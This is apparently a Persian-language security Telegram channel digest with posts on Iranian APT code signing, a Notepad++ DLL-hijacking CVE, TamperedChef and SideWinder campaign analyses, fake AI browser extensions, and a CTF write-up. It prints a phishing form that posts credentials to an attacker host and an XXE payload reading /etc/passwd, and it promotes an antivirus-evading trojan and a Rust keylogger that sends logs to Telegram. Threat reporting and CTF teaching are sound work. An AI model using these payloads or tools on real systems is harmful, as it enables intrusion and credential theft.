✅#SSL

هکرهای APT ایران از گواهینامه‌های SSL.com برای امضای بدافزار استفاده می‌کنند

گروه‌های سایبری ایران (Charming Kitten , Subtle Snail , UNC1549 و زیر شاخه های آنها )از تکنیکی استفاده می‌کنند که در آن با جعل یا سوءاستفاده از گواهی‌های دیجیتال معتبر SSL/TLS ، بدافزارها و ابزارهای خود را امضا (Sign) می‌کنند.

### نکات کلیدی فنی و امنیتی

* هدف اصلی: هدف از امضای بدافزار با گواهی معتبر، فریب دادن سیستم‌عامل‌ها (به خصوص ویندوز) و ابزارهای امنیتی (مانند EDRها و آنتی‌ویروس‌ها) است که اغلب برنامه‌های امضا شده را قابل اعتمادتر و کمتر مخرب تلقی می‌کنند. این امر به بدافزار اجازه می‌دهد تا راحت‌تر از فیلترهای امنیتی عبور کرده و در شبکه قربانی پایداری (Persistence) ایجاد کند.

* روش‌های دستیابی به گواهی‌ها:

* سرقت گواهی: نفوذ به زیرساخت‌های مراکز صدور گواهی (CA - Certificate Authority) مانند حادثه مشهور Comodo و DigiNotar در سال‌های گذشته، که در آن هکرها توانستند گواهی‌های جعلی برای دامنه‌های مهم جهانی (مثل گوگل، یاهو) صادر کنند.

* خرید گواهی‌های مسروقه: خرید گواهی‌های معتبر مسروقه از بازارهای زیرزمینی دارک‌نت.

* استفاده از گواهی‌های منقضی/لغو شده: حتی برخی از گواهی‌های لغو شده یا منقضی شده نیز ممکن است توسط ابزارهای امنیتی قدیمی نادیده گرفته شوند.

* تأثیر بر شناسایی: امضای معتبر باعث می‌شود بدافزار از لحاظ ظاهری شبیه یک نرم‌افزار قانونی و قانونی به نظر برسد، که این موضوع کار مهندسی معکوس و تحلیل بدافزار را برای تحلیلگران امنیتی سخت‌تر می‌کند و شناسایی آن توسط سامانه‌های مبتنی بر امضا را مختل می‌سازد.

* ارتباط با APTها: این تکنیک به طور مکرر توسط گروه‌های APT ایرانی مشاهده شده است که نشان‌دهنده پیچیدگی و سطح بالای دانش فنی این بازیگران در دور زدن مکانیزم‌های امنیتی پایه است.

@NullError_ir

✅Notepad++

آسیب‌پذیری DLL Hijacking در ++Notepad

یک آسیب‌پذیری جدید DLL Hijacking (تزریق کتابخانه پیوند پویا) که به تازگی در ++Notepad ، ویرایشگر محبوب کد منبع، کشف شده است، می‌تواند به مهاجمان اجازه دهد تا کد دلخواه را بر روی دیوایس قربانی اجرا کنند.

این نقص که با شناسه CVE-2025-56383 ثبت شده است، در نسخه 8.8.3 وجود دارد و به طور بالقوه تمامی نسخه‌های نصب شده این نرم‌افزار را تحت تأثیر قرار می‌دهد، که میلیون‌ها کاربر را در معرض خطر قرار می‌دهد. این آسیب‌پذیری به یک مهاجم محلی (Local Attacker) این امکان را می‌دهد که با قرار دادن یک فایل DLL مخرب در مسیری که برنامه برای بارگذاری کتابخانه‌های مورد نیاز خود جستجو می‌کند، به اجرای کد دست یابد. این نوع حمله، اصالت (Integrity) برنامه را تضعیف می‌کند و می‌تواند برای تثبیت دسترسی (Establish Persistence) یا افزایش سطح دسترسی (Escalate Privileges) در یک سیستم آلوده به کار رود.

## انتشار اکسپلویت (PoC Exploit) و جزئیات فنی

۔ DLL Hijacking از نحوه جستجو و بارگذاری کتابخانه‌های مورد نیاز توسط برنامه‌های ویندوز بهره‌برداری می‌کند. اگر یک برنامه بدون تعیین مسیر کامل (Full Path) برای یک DLL جستجو کند، ممکن است در چندین دایرکتوری، بر اساس یک ترتیب از پیش تعریف شده ، به دنبال آن بگردد.

یک مهاجم می‌تواند یک DLL مخرب با همان نام کتابخانه قانونی را در دایرکتوری‌ای قرار دهد که قبل از مکان واقعی کتابخانه توسط سیستم جستجو می‌شود. هنگامی که کاربر برنامه را راه‌اندازی می‌کند، DLL مخرب به جای کتابخانه اصلی بارگذاری و اجرا می‌شود.

در مورد ++Notepad ، این آسیب‌پذیری می‌تواند با هدف قرار دادن DLLهای مرتبط با پلاگین‌های (Plugins) آن بهره‌برداری شود. بر اساس اثبات مفهوم (PoC) منتشر شده، مهاجم می‌تواند فایل یک پلاگین، مانند NppExport.dll که در مسیر ++Notepad\plugins\NppExport\ قرار دارد، را با یک DLL مخرب ساخته‌شده سفارشی (Custom-Crafted Malicious DLL) جایگزین کند.

### تکنیک Proxying برای پنهان‌کاری

برای پنهان ماندن از دید کاربر و اطمینان از اینکه عملکرد برنامه به صورت عادی ادامه پیدا کند، مهاجم می‌تواند DLL اصلی را تغییر نام دهد (مثلاً به original-NppExport.dll ) و سپس کاری کند که جایگزین مخرب، تمام فراخوانی‌های تابع قانونی (Legitimate Function Calls) را به سمت DLL اصلی تغییر نام داده شده، ارجاع (Forward) دهد.

این تکنیک که به عنوان Proxying یا واسطه‌گری شناخته می‌شود، باعث می‌شود رفتار برنامه برای کاربر بدون مشکل (Seamless) به نظر برسد، در حالی که بار داده‌ای مخرب (Malicious Payload) در پس‌زمینه در حال اجرا است.

اندازه فایل NppExport.dll مخرب به طور قابل توجهی کوچکتر از original-NppExport.dll است که نشان‌دهنده وجود کد متفاوت در آن است.

### اجرای فایل مخرب

پس از راه‌اندازی Notepad++.exe ، برنامه، DLL مخرب را بارگذاری می‌کند که منجر به اجرای کد مهاجم می‌شود.

## تثبیت دسترسی و راهکارهای مقابله

تهدید اصلی ناشی از این آسیب‌پذیری، اجرای کد محلی است. مهاجمی که پیش‌تر از طریق بدافزار، فیشینگ یا سایر روش‌ها، دسترسی اولیه به سیستم را به دست آورده باشد، می‌تواند از این نقص برای تثبیت دسترسی استفاده کند.

با Hijack کردن یک DLL در برنامه‌ای پرکاربرد مانند ++Notepad ، کد مهاجم هر بار که کاربر ویرایشگر را باز می‌کند اجرا خواهد شد و این امر بقا و ماندگاری بدافزار را پس از راه‌اندازی مجدد سیستم تضمین می‌کند.

اگرچه این در تست بر روی Notepad++ v8.8.3 نصب شده از طریق نصاب رسمی انجام شده است، اما مشکل زمینه‌ای، اساساً به نحوه بارگذاری مؤلفه‌های برنامه مرتبط است، که نشان می‌دهد هر نسخه نصب شده‌ای می‌تواند آسیب‌پذیر باشد.

### در حال حاضر در این لحظه، هیچ پچ رسمی از سوی توسعه‌دهندگان ++Notepad برای رفع CVE-2025-56383 منتشر نشده است.

@NullError_ir

✅#SatelliteModems

تحقیقات جامع در مورد مودم‌های ماهواره‌ای تجاری موجود در بازار نشان دهنده آسیب‌پذیری‌های امنیتی زیادی در این تجهیزات است.

نکته : رمزگذاری در بسیاری از مودم‌های ماهواره‌ای تجاری به طور پیش‌فرض غیرفعال است - و گاهی اوقات فعال کردن آن هزینه اضافی دارد. در نتیجه، بسیاری از کاربران هرگز رمزگذاری را فعال نمی‌کنند .

تحلیل جامع آسیب‌پذیری‌ها و حملات امنیتی در مودم‌های ماهواره‌ای (به زبان انگلیسی)👇

@NullError_ir

✅#Cracks

✈️ این رو هم ببینید جالبه

▶️ شکستن قفل گاوصندوق

✅ نکته : وقتی شرکت‌های امنیتی بر روی محصولاتشان راهی برای

Reset/Forget/Recovery Password

می‌گذارند و هکرها از آن به عنوان

Backdoor
استفاده می‌کنند .

✈️ @NullError_ir

  

✅#TamperedChef

بدافزار TamperedChef

کمپین جدید بدافزار TamperedChef یک نمونه بارز از رویکرد مهاجمان برای ادغام تکنیک‌های مهندسی نرم‌افزار مدرن با مکانیزم‌های گریز پیشرفته است. این بدافزار با استفاده از برنامه‌های کاربردی تروجان‌شده (Trojanized Productivity Tools) مانند Calendaromatic.exe و ImageLooker.exe ، به طور هدفمند دفاع‌های امنیتی سنتی را دور می‌زند.

۱. دسترسی اولیه

طعمه طعمه‌های این کمپین ابزارهای بهره‌وری به‌ظاهر بی‌ضرر مانند تقویم و نمایشگر تصویر هستند.

توزیع فایل‌های مخرب از طریق آرشیوهای 7-Zip توزیع می‌شوند.

سوءاستفاده از نقص امنیتی نکته فنی کلیدی در این مرحله، بهره‌برداری از آسیب‌پذیری CVE-2025-0411 در مکانیزم Mark of the Web (MotW) ویندوز است.

* مکانیزم MotW: این مکانیزم برای علامت‌گذاری فایل‌هایی است که از اینترنت دانلود شده‌اند و به ویندوز هشدار می‌دهد که باید کنترل‌های امنیتی سخت‌گیرانه‌تری (مانند SmartScreen ) را اعمال کند.

* حمله: با سوءاستفاده از نقص در نحوه مدیریت فایل‌های 7-Zip، بدافزار می‌تواند بدون فعال کردن هشدارهای امنیتی مبتنی بر اعتبار (Reputation-Based Security Controls)، اجرا شود و این کار، مرحله Initial Access را برای مهاجم به شدت تسهیل می‌کند.

۲. پیچیدگی فنی: استفاده از NeutralinoJS و مهندسی بدافزار

چارچوب ساخت بدافزار هر دو فایل Calendaromatic.exe و ImageLooker.exe با استفاده از NeutralinoJS ساخته شده‌اند.

*۔ NeutralinoJS یک چارچوب دسکتاپ سبک‌وزن که به توسعه‌دهندگان اجازه می‌دهد تا برنامه‌های دسکتاپ بومی (Native Desktop Applications) را با استفاده از HTML، CSS و JavaScript بسازند.

* مزیت برای مهاجم این انتخاب به بدافزار اجازه می‌دهد تا ضمن حفظ ظاهر کاملاً قانونی یک نرم‌افزار دسکتاپ، از قدرت و انعطاف‌پذیری جاوا اسکریپت برای اجرای بارهای مخرب و تعامل مستقیم با APIهای سیستم‌عامل استفاده کند. این یک تکنیک Defense Evasion عالی است، زیرا بسیاری از راهکارهای امنیتی، رفتار چارچوب‌های توسعه مشروع را به‌دقت مانیتور نمی‌کنند.

* امضای دیجیتال استفاده از امضاهای دیجیتال معتبر (اگرچه از نهادهای مشکوک مانند CROWN SKY LLC و LIMITED LIABILITY COMPANY APPSOLUTE) به منظور فریب کاربر و همچنین دور زدن فیلترهای امنیتی مبتنی بر اعتبار و شهرت است.

۳. مکانیزم گریز پیشرفته از طریق یونیکد

یکی از پیشرفته‌ترین تکنیک‌های گریز در این بدافزار، استفاده از هموگلیف‌های یونیکد (Unicode Homoglyphs) است:

* عملکرد: بدافزار بارهای مخرب (Malicious Payloads) خود را در پاسخ‌های API که به‌ظاهر بی‌خطر هستند، با استفاده از هموگلیف‌های یونیکد رمزگذاری (Encode) می‌کند.

* گریز از تشخیص: این تکنیک به بدافزار اجازه می‌دهد تا از سیستم‌های تشخیص مبتنی بر رشته (String-Based Detection) و الگوریتم‌های تطبیق امضا (Signature Matching) عبور کند. این ابزارها برای شناسایی الگوهای مشخص در ترافیک شبکه یا فایل‌ها طراحی شده‌اند. وقتی داده‌ها با کاراکترهای یونیکد جایگزین می‌شوند (که شبیه کاراکترهای عادی هستند اما کد متفاوتی دارند)، تشخیص سنتی شکست می‌خورد.

* کانال اجرای مخفی: هنگام اجرا، بدافزار این پیلودهای پنهان را رمزگشایی کرده و آن‌ها را از طریق زمان اجرای NeutralinoJS اجرا می‌کند و عملاً یک کانال اجرای مخفی (Covert Execution Channel) ایجاد می‌کند که زیر رادار سیستم‌های نظارتی مرسوم کار می‌کند.

۴. پایداری و استخراج داده

* پایداری بدافزار از طریق ایجاد وظایف زمان‌بندی‌شده (Scheduled Tasks) و تغییرات در رجیستری ویندوز (Registry Modifications) ، پایداری خود را تضمین می‌کند. استفاده از پرچم‌های خط فرمان (Command-line Flags) مانند --install ، --enableupdate و --fullupdate نشان می‌دهد که مهاجم یک معماری مدولار و قابل کنترل برای مدیریت وضعیت بدافزار دارد.

* فرمان و کنترل : پس از نصب موفق، بدافزار به سرعت با سرورهای فرمان و کنترل (مانند calendaromatic[.]com و movementxview[.]com) ارتباط برقرار می‌کند.

* رمزگذاری C2: این ارتباطات از طریق کانال‌های رمزگذاری‌شده (Encrypted Channels) انجام می‌شود، که تلاش تیم‌های آبی (Blue Teams) برای شناسایی محتوای داده‌های ارسالی یا دستورات دریافتی را به شدت پیچیده می‌کند.

* تأثیر مخرب (Impact): تأثیر بدافزار شامل:

* سرقت اعتبارنامه‌ها و Session Tokens: استخراج اطلاعات ذخیره‌شده حساس از مرورگرها.

* ربایش مرورگر (Browser Hijacking): تغییر تنظیمات مرورگر و هدایت ترافیک وب برای تسهیل فعالیت‌های مخرب مستمر.

* دسترسی دائمی Backdoor: فراهم کردن امکان استخراج داده و اجرای دستورات از راه دور.

@NullError_ir

✅#Ai_Extensions

افزونه‌های جعلی هوش مصنوعی در مرورگرها

مهاجمان در حال انتشار افزونه‌های مخرب برای خصوصا مرورگر کروم هستند که خود را به جای ابزارهای معروف هوش مصنوعی مانند ChatGPT، Claude و Perplexity جا می‌زنند.

روش حمله: این افزونه‌ها پس از نصب، به‌طور مخفیانه موتور جستجوی پیش‌فرض مرورگر شما را تغییر می‌دهند. در نتیجه، تمام جستجوهای شما ابتدا از سرورهای مهاجم عبور می‌کند.

خطر اصلی: این کار به مهاجمان اجازه می‌دهد تمام اطلاعاتی که جستجو می‌کنید (شامل داده‌های شخصی، اطلاعات کاری و محرمانه) را سرقت کنند. این یک حمله از نوع Man-in-the-Middle است.

نحوه توزیع: این افزونه‌های مخرب اغلب از طریق تبلیغات فریبنده و ویدیوهای تبلیغاتی در یوتیوب پخش می‌شوند.

از نصب افزونه‌های ناشناس برای دسترسی به سرویس‌های محبوب خودداری کنید. همیشه قبل از نصب، مجوزهای درخواستی افزونه را به‌دقت بررسی کنید، به‌خصوص اگر درخواست تغییر تنظیمات مرورگر را داشته باشد. تنها از منابع رسمی و کاملاً معتبر افزونه نصب کنید.

اطلاعات بیشتر و شناسایی نمونه‌ها

@NullError_ir

✅#Motorola

دوستانی هم که به این موضوعات علاقه دارند

کالبد شکافی رادیو بیسیم موتورولا

@NullError_ir

✅#Trojan

( c++ ) 🔥🔥🔥

یک نمونه تروجان که می‌تواند اکثر نرم‌افزارهای آنتی‌ویروس و سندباکس‌ها را دور بزند .


نحوه استفاده رو نوشته دقت کنید.

@NullError_ir

✅#GOLANG_Reverse_Engineering

مهندسی معکوس فایل‌های گولنگ با IDA

@NullError_ir

✅#obex

ابزاری برای مسدود کردن dll‌های ناخواسته موقع اجرای یه برنامه - ارزشمند برای نفوذگرها و رد‌ تیم‌ها

@NullError_ir

✅#APT_SideWinder

کمپین جدید SideWinder با هدف سرقت اطلاعات

گروه هکری (APT) SideWinder که یک گروه با حمایت دولتی و سابقه طولانی در عملیات‌های جاسوسی سایبری در جنوب آسیا شناخته می‌شود، اخیراً کمپین فیشینگ جدیدی را با استفاده از پورتال‌های جعلی سرویس‌های ایمیل Outlook و Zimbra آغاز کرده است. هدف اصلی این عملیات، سرقت اطلاعات ورود (Credentials) از اهداف حساس دولتی و نظامی است.

جزئیات فنی و تاکتیک‌های عملیاتی

1. زیرساخت حمله:

* مهاجمان برای میزبانی صفحات فیشینگ خود از پلتفرم‌های هاستینگ رایگان و معتبر مانند Netlify و pages.dev و workers.dev استفاده می‌کنند. این رویکرد دو مزیت کلیدی برای آن‌ها دارد:

* فرار از مکانیزم‌های دفاعی: با استفاده از سرویس‌های معتبر، مهاجمان به‌راحتی فیلترهای مبتنی بر reputaion دامنه را دور می‌زنند.

* سرعت عملیاتی بالا : این گروه قادر است به‌سرعت دامنه‌های فیشینگ خود را تغییر دهد. طبق گزارش، هر سه تا پنج روز یک سایت جدید ایجاد می‌شود که این موضوع شناسایی و مسدودسازی آن‌ها را دشوار می‌کند.

2. روش فریب و طعمه‌ها:

* این گروه از اسناد با مضامین دریایی و دفاعی به‌عنوان طعمه برای فریب قربانیان استفاده می‌کند.

* نمونه‌های مشخص:

* در بنگلادش، وب‌سایت اداره کل خریدهای دفاعی (DGDP) جعل شده و پورتال‌هایی با عنوان "Secured File" ایجاد گردیده که از قربانیان می‌خواهد برای دسترسی به جزئیات تجهیزات دفاعی ترکیه، اطلاعات ورود ایمیل خود را وارد کنند.

* در نپال، کارمندان وزارت دارایی ایمیل‌هایی حاوی یک فایل PDF فریبنده با عنوان सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf (در خصوص سفر نخست‌وزیر محترم به چین) دریافت کرده‌اند که آن‌ها را به یک صفحه لاگین جعلی Outlook در بستر Netlify (با آدرس IP: 98.84.224.111 ) هدایت می‌کند.

3. مکانیزم سرقت اطلاعات:

* برخلاف بسیاری از حملات که متکی بر پی‌لودهای بدافزاری سمت کلاینت هستند، این کمپین مستقیماً از طریق فرم‌های HTML اطلاعات را جمع‌آوری می‌کند.

* یک فرم HTML ساده، اطلاعات وارد شده (نام کاربری و رمز عبور) را از طریق یک درخواست POST به سرور تحت کنترل مهاجم ارسال می‌کند. نمونه‌ای از این کد برای هدف قرار دادن SUPARCO (سازمان تحقیقات فضایی و جوی پاکستان) مشاهده شده است:

        <form method="POST" action="https://technologysupport.help/1pac.php">
          <input type="hidden" name="inbox" value="Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs=">
          <label for="email">Email:</label>
          <input type="email" id="email" name="user_email" required>
          <label for="pass">Password:</label>
          <input type="password" id="pass" name="user_pass" required>
          <button type="submit">Sign In</button>
        </form>
        

* تحلیل کد:

* یک فیلد مخفی (hidden ) با نام inbox در فرم وجود دارد که مقدار آن یک آدرس ایمیل رمزنگاری‌شده با Base64 است Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs= که معادل chairman@waparco.gov.pk است. این تکنیک به مهاجمان اجازه می‌دهد تا اطلاعات سرقت‌شده را با کمپین‌های خاص خود مرتبط سازند.

* اطلاعات مستقیماً به آدرس https://technologysupport.help/1pac.php ارسال می‌شود.

4. تکنیک‌های تکمیلی و پنهان‌سازی:

* در برخی موارد، از کدهای JavaScript برای افزایش پیچیدگی حمله استفاده می‌شود. برای مثال، آدرس ایمیل قربانی قبل از ارسال به صفحه فیشینگ ثانویه، با Base64 کدگذاری می‌شود. این کار هم به ردیابی نشست‌ها (Session Tracking) کمک می‌کند و هم تحلیل‌های سطحی و سریع را با چالش مواجه می‌سازد.

* پس از ارسال اطلاعات، ممکن است یک پیغام reload به کاربر نمایش داده شود تا در صورت ورود اطلاعات اشتباه، مجدداً آن‌ها را وارد کند.

اهداف و گستره جغرافیایی

این کمپین به‌طور خاص بر روی سازمان‌های دولتی و نظامی در کشورهای جنوب آسیا متمرکز است، از جمله:

* پاکستان
* نپال
* سریلانکا
* بنگلادش
* میانمار

مراحل پس از بهره‌برداری

اطلاعات سرقت‌شده در فرآیندهای جاسوسی گسترده‌تر این گروه مورد استفاده قرار می‌گیرد. این اطلاعات به SideWinder اجازه می‌دهد تا به شبکه‌های محدودشده دسترسی پیدا کند یا در مراحل بعدی، بدافزارهای خود را از دایرکتوری‌های باز روی سرورهای خود مانند IPهای 47.236.177.123 و 31.14.142.50 مستقر کند.


@NullError_ir

✅#CVE

جدیدترین CVEها به همراه اکسپلویت‌ها

#infosec #pentest #redteam #blueteam

@NullError_ir

🔤➕➕ ❌ 📺

✅#Anti_Screen

یک کد ساده برای جلوگیری از گرفته شدن اسکرین‌شات یا ضبط ویدیو از محتوای پنجره‌ی برنامه که البته کاربردهای دیگه‌ای هم داره :

1. پنهان‌سازی فعالیت بدافزار: یک بدافزار می‌تواند رابط کاربری خود (مثلاً یک پنجره‌ی تنظیمات یا یک فیشینگ پاپ‌آپ) را با این تکنیک محافظت کند. این کار تحلیلگران امنیتی را که از ابزارهای مبتنی بر اسکرین‌شات یا ضبط ویدیو برای مستندسازی و تحلیل رفتار بدافزار در محیط‌های سندباکس استفاده می‌کنند، با چالش مواجه می‌کند.

2. جلوگیری از گزارش‌گیری کاربر: اگر یک بدافزار یک پنجره‌ی جعلی برای دریافت اطلاعات حساس (مانند رمز عبور) نمایش دهد، استفاده از SetWindowDisplayAffinity می‌تواند مانع از این شود که کاربر به راحتی از آن پنجره اسکرین‌شات گرفته و برای تیم پشتیبانی یا امنیتی ارسال کند.

3. دور زدن سیستم‌های مانیتورینگ: برخی از سیستم‌های نظارت بر فعالیت کاربر (Employee Monitoring) یا ابزارهای (Parental Control) برای رصد فعالیت‌ها به صورت دوره‌ای اسکرین‌شات می‌گیرند. یک برنامه مخرب می‌تواند با این روش خود را از دید این سیستم‌ها پنهان کند.

@NullError_ir

✅#Keylogger

یک کیلاگر نوشته شده با Rust

درود به همه دوستان و اساتید . این سورس کد ساده بدافزار کیلاگر که با زبان برنامه‌نویسی Rust قبلا به عنوان نمونه نوشته بودم برای لینوکس هست که لاگ‌ها رو جمع آوری و به تلگرام میفرسته .

نکاتی داره برای آموزش و یادگیری و البته نقاط ضعفش رو هم نوشتم که بدونید و خودتون جهت یادگیری اصلاحش کنید . مثل :

مشخص بودن مقادیر ربات تلگرام (توکن و آی‌دی) در سورس کد.

ثبت شدن پیغام‌های خطا (eprintln!) در کد.

ثابت بودن مسیر دایرکتوری (/tmp/k-pro-logs) که به راحتی توسط ابزارهای مانیتورینگ فایل قابل شناسایی است.

🔠🔠🔠🔠

@NullError_ir

✅#CTF

چالش CTF Anonymous
زنجیره‌ای از آسیب‌پذیری‌ها تا اجرای کد از راه دور (RCE)

این چالش یک نمونه‌ی آموزشی عالی از چگونگی زنجیره‌ای کردن آسیب‌پذیری‌ها (Vulnerability Chaining) برای دستیابی به بالاترین سطح دسترسی در یک سیستم است. مهاجم با ترکیب هوشمندانه یک آسیب‌پذیری XML External Entity (XXE) با یک مکانیزم معیوب در بارگذاری فایل، موفق به اجرای کد از راه دور (RCE) می‌شود. در ادامه، هر مرحله با جزئیات فنی دقیق‌تر شکافته می‌شود.

مرحله اول: کشف و بهره‌برداری از آسیب‌پذیری XXE

حمله با یک آسیب‌پذیری کلاسیک اما همچنان بسیار خطرناک، یعنی XXE آغاز می‌شود.

۱. شناسایی نقطه ضعف

تحلیل کد جاوا اسکریپت در سمت کلاینت نشان می‌دهد که داده‌های فرم در قالب یک ساختار **XML به فایل notify.php ارسال می‌شوند. این الگو بلافاصله باید زنگ خطر را برای هر متخصص امنیتی به صدا درآورد. هرگاه یک برنامه ورودی کاربر را درون یک سند XML پردازش می‌کند، پتانسیل حمله XXE وجود دارد، مگر اینکه پردازنده XML به طور صریح و ایمن پیکربندی شده باشد.

کد جاوا اسکریپت تابعی را نشان می‌دهد که یک پیلود XML می‌سازد و آن را ارسال می‌کند. این ساختار به مهاجم اجازه می‌دهد تا کنترل کامل بر محتوای XML ارسالی داشته باشد.

۲. اثبات آسیب‌پذیری و استخراج اطلاعات

مهاجم با استفاده از ابزاری مانند cURL ، یک پیلود XML دستکاری‌شده را ارسال می‌کند. این پیلود شامل یک External Entity است که به یک فایل محلی روی سرور (/etc/passwd) اشاره می‌کند.

پیلود نمونه:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</user>

<!DOCTYPE user [...]> : این بخش یک Document Type Definition (DTD) را تعریف می‌کند.

<!ENTITY xxe SYSTEM "file:///etc/passwd"> : این قسمت یک موجودیت (Entity) به نام xxe تعریف می‌کند که محتوای آن از فایل /etc/passwd خوانده می‌شود.

&xxe; : در بدنه XML، با فراخوانی این موجودیت، پردازنده XML محتوای فایل را جایگزین آن کرده و در پاسخ به مهاجم برمی‌گرداند.

موفقیت در خواندن این فایل، آسیب‌پذیری In-Band XXE را تأیید می‌کند و نشان می‌دهد که مهاجم قابلیت خواندن فایل‌های دلخواه روی سیستم را با سطح دسترسی کاربر وب‌سرور (مثلاً www-data) دارد.

مرحله دوم: شناسایی میزبان مخفی و حرکت جانبی (Lateral Movement)

پس از به دست آوردن قابلیت خواندن فایل، مهاجم از این دسترسی برای فاز شناسایی (Enumeration) عمیق‌تر سیستم استفاده می‌کند.

۱. خواندن فایل‌های پیکربندی

یک هدف کلیدی در این مرحله، فایل‌های پیکربندی وب‌سرور است. در این مورد، فایل /etc/apache2/sites-enabled/000-default.conf حاوی اطلاعات ارزشمندی است. این فایل پیکربندی Virtual Hosts در آپاچی را تعریف می‌کند.

۲. کشف anonupload.cyberquest

محتوای این فایل یک میزبان (Host) جدید به نام anonupload.cyberquest را آشکار می‌کند که روی همان سرور و آدرس IP میزبانی می‌شود اما از طریق دامنه اصلی قابل دسترسی نیست. این یک تکنیک رایج برای پنهان کردن پنل‌های ادمین یا سرویس‌های داخلی است.

۳. دسترسی به میزبان جدید

مهاجم با افزودن رکورد زیر به فایل /etc/hosts سیستم محلی خود، به سیستم‌عامل خود می‌آموزد که چگونه دامنه anonupload.cyberquest را به آدرس IP سرور هدف ترجمه کند:
35.200.207.70 anonupload.cyberquest

این کار به او اجازه می‌دهد تا مستقیماً به وب‌سایت مخفی دسترسی پیدا کند، که در این مورد یک صفحه آپلود فایل محافظت‌شده با رمز عبور است.

مرحله سوم: دور زدن احراز هویت و تحلیل مکانیزم آپلود

مهاجم مجدداً از همان آسیب‌پذیری XXE، اما این بار برای یک هدف جدید، استفاده می‌کند: خواندن کد منبع صفحه آپلود.

۱. استخراج کد منبع و رمز عبور

با ارسال یک پیلود XXE برای خواندن فایل /var/www/anonupload.cyberquest/index.php ، مهاجم به کد PHP صفحه دسترسی پیدا می‌کند. تحلیل این کد، رمز عبور supersecret1234564_niceeeee132213 را که به صورت Hardcoded در کد قرار داده شده است، فاش می‌کند. این یک اشتباه امنیتی بسیار رایج و خطرناک است.

۲. ورود به پنل آپلود

پس از ورود، مهاجم با یک فرم آپلود فایل مواجه می‌شود که دارای چندین لایه امنیتی است. تحلیل این لایه‌ها کلید موفقیت در مرحله نهایی است.

مرحله چهارم: دور زدن پیچیده فیلتر آپلود فایل

این بخش جذاب‌ترین و فنی‌ترین قسمت چالش است و یک ضعف کلاسیک در منطق برنامه‌نویسی را به نمایش می‌گذارد.